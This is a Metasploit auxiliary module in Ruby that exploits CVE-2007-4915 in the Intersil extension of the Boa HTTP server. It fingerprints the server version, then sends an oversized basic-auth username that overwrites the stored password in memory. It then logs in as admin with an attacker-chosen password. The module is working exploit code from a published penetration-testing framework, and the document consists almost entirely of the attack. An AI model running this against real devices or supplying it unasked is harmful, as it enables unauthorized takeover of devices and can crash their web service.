1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
14
        'Description' => %q{
15
          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
16
          allows basic authentication bypass when the user string is greater
17
          than 127 bytes long.  The long string causes the password to be
18
          overwritten in memory, which enables the attacker to reset the
19
          password.  In addition, the malicious attempt also may cause a
20
          denial-of-service condition.
21

22
          Please note that you must set the request URI to the directory that
23
          requires basic authentication in order to work properly.
24
        },
25
        'Author' => [
26
          'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
27
          'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
28
          'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2007-4915' ],
33
          [ 'BID', '25676'],
34
          [ 'PACKETSTORM', '59347']
35
        ],
36
        'DisclosureDate' => '2007-09-10',
37
        'Notes' => {
38
          'Stability' => [CRASH_SERVICE_DOWN],
39
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
40
          'Reliability' => []
41
        }
42
      )
43
    )
44

45
    register_options(
46
      [
47
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
48
        OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
49
      ]
50
    )
51
  end
52

53
  def check
54
    res = send_request_cgi({
55
      'uri' => '/',
56
      'method' => 'GET'
57
    })
58

59
    if res && (m = res.headers['Server'].match(%r{Boa/(.*)}))
60
      vprint_status("Boa Version Detected: #{m[1]}")
61
      return Exploit::CheckCode::Safe if (m[1][0].ord - 48 > 0) # boa server wrong version
62
      return Exploit::CheckCode::Safe if (m[1][3].ord - 48 > 4)
63

64
      return Exploit::CheckCode::Vulnerable
65
    end
66

67
    return Exploit::CheckCode::Safe('Not a Boa Server!')
68
  rescue Rex::ConnectionRefused
69
    print_error('Connection refused by server.')
70
    return Exploit::CheckCode::Safe
71
  end
72

73
  def run
74
    return if check != Exploit::CheckCode::Vulnerable
75

76
    uri = normalize_uri(target_uri.path)
77
    uri << '/' if uri[-1, 1] != '/'
78

79
    res = send_request_cgi({
80
      'uri' => uri,
81
      'method' => 'GET',
82
      'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), datastore['PASSWORD'])
83
    })
84

85
    if res.nil?
86
      print_error('The server may be down')
87
      return
88
    end
89

90
    if res.code != 401
91
      print_status("#{uri} does not have basic authentication enabled")
92
      return
93
    end
94

95
    print_status('Server still operational. Checking to see if password has been overwritten')
96
    res = send_request_cgi({
97
      'uri' => uri,
98
      'method' => 'GET',
99
      'authorization' => basic_auth('admin', datastore['PASSWORD'])
100
    })
101

102
    if !res
103
      print_error('Server timed out, will not continue')
104
      return
105
    end
106

107
    case res.code
108
    when 200
109
      print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
110
    when 401
111
      print_error('Access forbidden. The password reset attempt did not work')
112
    else
113
      print_status("Unexpected response: Code #{res.code} encountered")
114
    end
115
  end
116
end
117

118